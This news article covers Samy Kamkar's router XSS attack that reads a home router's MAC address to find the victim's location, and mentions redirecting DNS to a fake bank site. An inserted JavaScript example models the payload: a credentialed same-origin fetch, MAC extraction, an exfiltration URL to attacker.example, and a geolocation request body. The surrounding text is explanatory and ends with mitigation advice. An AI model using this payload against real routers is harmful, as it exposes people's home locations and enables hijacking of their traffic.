Remember the infamous 'Samy' worm that spread via MySpace in 2005 and infected some 1 million users within 20 hours? Well, Samy Kamkar, who wrote that worm to make "friends" on MySpace, has re-emerged as an independent security researcher and this year came up with a hack that works out where you live from your home router.
Kamkar earlier this year published a proof-of-concept that identifies a user's geographic location via the victim's home router, using a cross-site scripting (XSS) bug he discovered in a Verizon FiOS wireless router. Through the XSS, Kamkar was able to read the router's MAC address and then map it to GPS coordinates via Google Location Services.
"The interesting bit is I'm not piggybacking off of the browser's geolocation feature. I simply reimplemented the feature as a server-side tool," Kamkar says. "This way if I can obtain the user's router's MAC address in any way, regardless of browser, nationality, or age, I can typically determine their location and show up at their place with pizza and beer later that night."
Although his attack is based on an XSS flaw in the Verizon FiOS router, Kamkar says it would work with any other router that has an XSS vulnerability. There are a couple of preconditions: the victim must be logged into her router and must visit a malicious or infected website carrying the XSS exploit. The injected script then runs in the router's Web origin, so the attacker can fetch the router's MAC address via Ajax and map it to her GPS coordinates via Google Location Services. Kamkar says the same XSS could also be used to change the DNS settings on the victim's router, for example to divert the victim's traffic bound for her bank's site. "I can then divert any host name-based traffic to locations of my choice -- for example, sending DNS requests for 'bankofamerica.com' to my own IP address/Website, which we'll just call 'Bank of Samy,' or simply proxy all traffic, becoming a man-in-the-middle [and] reading their email and chatting in place of them with their significant others," he says.
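The chain described above, as an added example that is not Kamkar's code or the original article's: the part an XSS payload running in the router's origin performs (fetch the status page same-origin, pull out the MAC address, exfiltrate it) and the part the attacker's server performs (build the Wi-Fi geolocation request). The router status page is a constructed stand-in with hypothetical field labels, the collector URL is hypothetical, and the request-body shape follows Google's current Geolocation API rather than the 2010 service Kamkar used; nothing is sent over the network.

```javascript
// Added example, not Kamkar's code. Models the two halves of the attack:
// (1) what the injected script does inside the router's origin, and
// (2) what the attacker's server does with the harvested MAC address.
// Everything is offline: the status page is a constructed string and the
// geolocation request is only built, never sent.

// Constructed stand-in for a router status page. Field labels are
// hypothetical; real firmware differs in layout and separator style.
const SAMPLE_STATUS_PAGE = `
<html><body>
<h1>Router Status</h1>
<table>
<tr><td>WAN IP</td><td>203.0.113.7</td></tr>
<tr><td>LAN MAC Address</td><td>00:1A:2B:3C:4D:5E</td></tr>
<tr><td>Wireless MAC (BSSID)</td><td>00-1A-2B-3C-4D-5F</td></tr>
<tr><td>Firmware</td><td>1.0.2</td></tr>
</table>
</body></html>`;

// Six hex octets separated by ':' or '-' (both occur in the wild).
// Dotted IPs and version strings do not match because of the separators.
const MAC_RE = /\b([0-9a-f]{2})(?:[:-]([0-9a-f]{2})){5}\b/gi;

// Pull every MAC-looking token out of the page, normalised to lower-case
// colon form, deduplicated, in page order.
function extractMacAddresses(html) {
  const seen = new Set();
  for (const m of html.matchAll(MAC_RE)) {
    seen.add(m[0].replace(/-/g, ':').toLowerCase());
  }
  return [...seen];
}

// (1) Payload side. Because the XSS runs in the router's origin, a plain
// same-origin request to the status page succeeds with the victim's
// session cookie and the response body is readable. fetchImpl is
// injectable so the function can be exercised without a router.
async function harvestFromRouter(statusUrl, fetchImpl = fetch) {
  const res = await fetchImpl(statusUrl, { credentials: 'include' });
  return extractMacAddresses(await res.text());
}

// Exfiltration URL for the attacker's collector (hypothetical host). A
// payload would typically load it via `new Image().src = url` so no
// cross-origin read is needed.
function buildExfilUrl(collectorUrl, macs) {
  const u = new URL(collectorUrl);
  u.searchParams.set('mac', macs.join(','));
  return u.toString();
}

// (2) Server side. Request body for a Wi-Fi geolocation lookup in the
// shape of Google's current Geolocation API (POST
// https://www.googleapis.com/geolocation/v1/geolocate?key=...). This is
// an assumption about the present-day API, not the 2010 endpoint; the
// request is not sent here. considerIp=false keeps the service from
// falling back to the querying server's own IP address.
function buildGeolocationRequest(macs) {
  return {
    considerIp: false,
    wifiAccessPoints: macs.map((mac) => ({ macAddress: mac })),
  };
}

// Stand-alone run against the constructed page.
const demoMacs = extractMacAddresses(SAMPLE_STATUS_PAGE);
console.log(buildExfilUrl('https://attacker.example/c', demoMacs));
console.log(JSON.stringify(buildGeolocationRequest(demoMacs), null, 2));
```

Every step the payload takes is an ordinary same-origin request, which is why staying logged in to the admin interface matters, and why the same request primitive can just as well POST to the router's DNS settings form. Firmware that HTML-escapes reflected values removes the injection point, and requiring re-authentication for settings changes blunts the DNS follow-on even if an injection remains.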
He says the crux of the problem is that security isn't part of the equation in router software. "It's probably assumed that because the router sits on your local network and isn't accessible from the outside world, it's safer," he says. "However, the fact is we can easily trick a user's Web browser to launch the attack for us."
Kamkar's advice to users: Change default passwords in your home router and don't remain logged into the router administrative interface unless you really need to be.